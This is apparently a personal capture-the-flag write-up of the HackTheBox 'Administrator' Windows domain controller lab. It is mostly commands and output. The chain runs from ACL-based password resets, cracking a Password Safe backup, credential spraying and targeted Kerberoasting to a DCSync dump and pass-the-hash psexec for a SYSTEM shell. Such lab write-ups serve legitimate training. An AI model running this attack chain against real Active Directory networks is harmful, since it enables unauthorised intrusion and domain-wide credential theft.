Administrator-HTB Notes

Administrator-HTB

Here is my notes on Administrator box from Hackthebox.

“`

Administrator: 10.129.113.255

#As is common in real life Windows pentests, you will start the Administrator box with credentials for the following account: Olivia / ichliebedich

PORT STATE SERVICE VERSION
21/tcp open ftp Microsoft ftpd

crackmapexec ftp 10.129.113.255 -u Benjamin -p Password123
FTP 10.129.113.255 21 10.129.113.255 [*] Banner: Microsoft FTP Service
FTP 10.129.113.255 21 10.129.113.255 [+] Benjamin:[REDACTED]

#FROM BLOODHOUND DATA ATTACK.

┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# ftp 10.129.113.255
Connected to 10.129.113.255.
220 Microsoft FTP Service
Name (10.129.113.255:kali): Benjamin
331 Password required
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||52548|)
125 Data connection already open; Transfer starting.
10-05-24 08:13AM 952 Backup.psafe3
226 Transfer complete.
ftp> binary
200 Type set to I.
ftp> passive
Passive mode: off; fallback to active mode: off.
ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
200 EPRT command successful.
125 Data connection already open; Transfer starting.
100% |**************************************************************************************************************| 952 24.23 KiB/s 00:00 ETA
226 Transfer complete.
952 bytes received in 00:00 (23.48 KiB/s)
ftp> exit
221 Goodbye.

┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# ls
Backup.psafe3

hashcat -a 0 -m 5200 Backup.psafe3 /usr/share/wordlists/rockyou.txt

Backup.psafe3:[REDACTED]

python2.7 /home/kali/CPTS-EXAM/results/AD/WS01/psafe3-to-keepass-csv/psafe3-to-keepass-csv.py ./Backup.psafe3 ./exported.csv

┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# cat exported.csv
group,title,username,password,url,notes,modified
,Alexander Smith,alexander,Urk[REDACTED],,,1969-12-31T19:00:00
,Emma Johnson,emma,WwANQW[REDACTED],,,1969-12-31T19:00:00
,Emily Rodriguez,emily,UXL[REDACTED],,,1969-12-31T19:00:00

alexander:UrkIba[REDACTED]
emma:WwANQWnm[REDACTED]
emily:UXLCI5[REDACTED]

┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# cat users.txt
alexander
emma
emily


┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# cat pass.txt
UrkIbago[REDACTED]
WwANQ[REDACTED]
UXLCI5[REDACTED]


┌──(root㉿kali)-[/home/kali/HTB/ADMIN/FTP]
└─# crackmapexec smb 10.129.113.255 -u users.txt -p pass.txt –no-bruteforce –continue-on-success
SMB 10.129.113.255 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.113.255 445 DC [-] administrator.htb\alexander:UrkIba[REDACTED] STATUS_LOGON_FAILURE
SMB 10.129.113.255 445 DC [-] administrator.htb\emma:WwANQWnm[REDACTED] STATUS_LOGON_FAILURE
SMB 10.129.113.255 445 DC [+] administrator.htb\emily:UXLCI[REDACTED]


crackmapexec winrm 10.129.113.255 -u users.txt -p pass.txt –no-bruteforce –continue-on-success
SMB 10.129.113.255 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:administrator.htb)
HTTP 10.129.113.255 5985 DC [*] http://10.129.113.255:5985/wsman
WINRM 10.129.113.255 5985 DC [-] administrator.htb\alexander:UrkIbago[REDACTED]
WINRM 10.129.113.255 5985 DC [-] administrator.htb\emma:WwANQWnm[REDACTED]
WINRM 10.129.113.255 5985 DC [+] administrator.htb\emily:UXLCI5iE[REDACTED] (Pwn3d!)



53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-11-29 03:06:38Z)

GetUserSPNs.py -request -dc-ip 10.129.113.255 administrator.htb/Olivia:ichliebedich
/usr/local/bin/GetUserSPNs.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__(‘pkg_resources’).run_script(‘impacket==0.9.24.dev1+20210704.162046.29ad5792’, ‘GetUserSPNs.py’)
Impacket v0.9.24.dev1+20210704.162046.29ad5792 – Copyright 2021 SecureAuth Corporation

No entries found!

#NO Kerberoasting.

#NO Asreproasting.

bloodhound-python -c All -u Olivia -p ‘ichliebedich’ -d administrator.htb –dns-tcp -ns 10.129.113.255

BloodHound DATA:

Olivia -> GenericAll -> Michael:

net rpc password “Michael” “[REDACTED]” -U “administrator.htb”/”Olivia”%”ichliebedich” -S 10.129.113.255

crackmapexec smb 10.129.113.255 -u Michael -p Password123
SMB 10.129.113.255 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.113.255 445 DC [+] administrator.htb\Michael:[REDACTED]


Michael -> ForceChangePassword -> Benjamin -> Member of -> Share Moderators Group:

net rpc password “Benjamin” “[REDACTED]” -U “administrator.htb”/”Michael”%”[REDACTED]” -S 10.129.113.255

crackmapexec smb 10.129.113.255 -u Benjamin -p [REDACTED]
SMB 10.129.113.255 445 DC [*] Windows 10.0 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB 10.129.113.255 445 DC [+] administrator.htb\Benjamin:[REDACTED]


Emily -> GenericWrite -> Ethan -> Member of -> Domain Admin Group:

python3 targetedKerberoast.py -v -d ‘administrator.htb’ -u ’emily’ -p ‘[REDACTED]’

sudo rdate -n 10.129.113.255

. .\PowerView.ps1

$SecPassword = ConvertTo-SecureString ‘UXLC[REDACTED]’ -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential(‘administrator.htb\emily’, $SecPassword)

Set-DomainObject -Identity ethan -SET @{serviceprincipalname=’nonexistent/BLAHBLAH’}

Get-DomainSPNTicket -Credential $Cred nonexistent/BLAHBLAH

john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
[REDACTED] (?)
1g 0:00:00:00 DONE (2024-11-28 16:30) 11.11g/s 56888p/s 56888c/s 56888C/s newzealand..babygrl
Use the “–show” option to display all of the cracked passwords reliably
Session completed.

ethan:[REDACTED]

#Now doing dcsync attacks.

sudo secretsdump.py -just-dc ethan:[REDACTED]@10.129.113.255

sudo secretsdump.py -just-dc ethan:[REDACTED]@10.129.113.255

/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__(‘pkg_resources’).run_script(‘impacket==0.9.24.dev1+20210704.162046.29ad5792’, ‘secretsdump.py’)
Impacket v0.9.24.dev1+20210704.162046.29ad5792 – Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:[REDACTED]

#Administrator HASH OBTAINED !


135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)

ldapsearch -H ldap://10.129.113.255 -x -W -D “Olivia@administrator.htb” -b “dc=administrator,dc=htb” ‘(objectClass=person)’ > ldap-people

Olivia is remote-management user.

445/tcp open microsoft-ds?

┌──(root㉿kali)-[/home/kali/HTB/10.129.113.255]
└─# smbclient -N -L 10.129.113.255 -U “Guest”
session setup failed: NT_STATUS_LOGON_FAILURE

┌──(root㉿kali)-[/home/kali/HTB/10.129.113.255]
└─# smbclient -N -L 10.129.113.255 -U “”

Sharename Type Comment
——— —- ——-
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.113.255 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 — no workgroup available

#NO SYSVOL xml or gpp scripts = DON’T BOTHER !



464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.

crackmapexec winrm 10.129.113.255 -u Olivia -p ‘ichliebedich’
SMB 10.129.113.255 5985 DC [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
HTTP 10.129.113.255 5985 DC [*] http://10.129.113.255:5985/wsman
WINRM 10.129.113.255 5985 DC [+] administrator.htb\Olivia:ichliebedich (Pwn3d!)


evil-winrm -i 10.129.113.255 -u Olivia -p ‘ichliebedich’

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents> whoami
administrator\olivia
*Evil-WinRM* PS C:\Users\olivia\Documents> hostname
dc

OLIVIA SHELL ! but no flag though.

adPEAS:

[*] +++++ Checking DCSync Rights +++++
[*] https://book.hacktricks.xyz/windows/active-directory-methodology/dcsync
Checking DCSync Rights – Details for Domain ‘administrator.htb’:
ActiveDirectoryRight : DS-Replication-Get-Changes
Identity : ADMINISTRATOR\ethan
distinguishedName : CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
ObjectSID : S-1-5-21-1088858960-373806567-254189436-1113

ActiveDirectoryRight : DS-Replication-Get-Changes-In-Filtered-Set
Identity : ADMINISTRATOR\ethan
distinguishedName : CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
ObjectSID : S-1-5-21-1088858960-373806567-254189436-1113

ActiveDirectoryRight : DS-Replication-Get-Changes-All
Identity : ADMINISTRATOR\ethan
distinguishedName : CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
ObjectSID : S-1-5-21-1088858960-373806567-254189436-1113


#ethan is a very interesting man or woman.

Import-Module .\PowerView.ps1
$sid = Convert-NameToSid Benjamin

Get-DomainObjectACL -ResolveGUIDs -Identity * | ? {$_.SecurityIdentifier -eq $sid}

Get-NetUser -Identity benjamin -domain administrator.htb

Get-ObjectAcl -Domain administrator.htb | Where-Object {$_.SecurityIdentifier -eq ‘S-1-5-21-1088858960-373806567-254189436-1110’}

olivia -> emily:

#FROM BLOODHOUND DATA ATTACK and FTP.

crackmapexec winrm 10.129.113.255 -u users.txt -p pass.txt –no-bruteforce –continue-on-success
SMB 10.129.113.255 5985 DC [*] Windows 10.0 Build 20348 (name:DC) (domain:administrator.htb)
HTTP 10.129.113.255 5985 DC [*] http://10.129.113.255:5985/wsman

WINRM 10.129.113.255 5985 DC [+] administrator.htb\emily:UXLC[REDACTED] (Pwn3d!)

evil-winrm -i 10.129.113.255 -u emily -p ‘UXLC[REDACTED]’

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily
*Evil-WinRM* PS C:\Users\emily\Documents> hostname
dc

EMILY SHELL !

*Evil-WinRM* PS C:\Users\emily\Desktop> whoami
administrator\emily
*Evil-WinRM* PS C:\Users\emily\Desktop> hostname
dc
*Evil-WinRM* PS C:\Users\emily\Desktop> dir


Directory: C:\Users\emily\Desktop


Mode LastWriteTime Length Name
—- ————- —— —-
-a—- 10/30/2024 2:23 PM 2308 Microsoft Edge.lnk
-ar— 11/28/2024 6:58 PM 34 user.txt


*Evil-WinRM* PS C:\Users\emily\Desktop> type user.txt
[REDACTED]


USER.TXT: [REDACTED]

PRIV ESC:

#FROM BLOODHOUND DATA ATTACK: emily -> ethan

sudo secretsdump.py -just-dc ethan:[REDACTED]@10.129.113.255

/usr/local/bin/secretsdump.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__(‘pkg_resources’).run_script(‘impacket==0.9.24.dev1+20210704.162046.29ad5792’, ‘secretsdump.py’)
Impacket v0.9.24.dev1+20210704.162046.29ad5792 – Copyright 2021 SecureAuth Corporation

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:[REDACTED]

#Administrator HASH OBTAINED !

psexec.py -hashes :3dc5[REDACTED] Administrator@10.129.113.255
/usr/local/bin/psexec.py:4: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
__import__(‘pkg_resources’).run_script(‘impacket==0.9.24.dev1+20210704.162046.29ad5792’, ‘psexec.py’)
Impacket v0.9.24.dev1+20210704.162046.29ad5792 – Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.129.113.255…..
[*] Found writable share ADMIN$
[*] Uploading file ZJjIDGDF.exe
[*] Opening SVCManager on 10.129.113.255…..
[*] Creating service IOOe on 10.129.113.255…..
[*] Starting service IOOe…..
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.2762]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

C:\Windows\system32>hostname
dc

SYSTEM-SHELL !

C:\Users\Administrator\Desktop>whoami
nt authority\system

C:\Users\Administrator\Desktop>hostname
dc

C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 6131-DE70

Directory of C:\Users\Administrator\Desktop

11/01/2024 01:47 PM <DIR> .
10/22/2024 10:46 AM <DIR> ..
11/28/2024 06:58 PM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 5,385,117,696 bytes free

C:\Users\Administrator\Desktoptype root.txt
[REDACTED]

ROOT.TXT: [REDACTED]










9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-stored-xss: Couldn’t find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-csrf: Couldn’t find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn’t find any DOM based XSS.
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
51449/tcp open msrpc Microsoft Windows RPC
64285/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64290/tcp open msrpc Microsoft Windows RPC
64301/tcp open msrpc Microsoft Windows RPC
64315/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

“`

Thanks you for reading my note !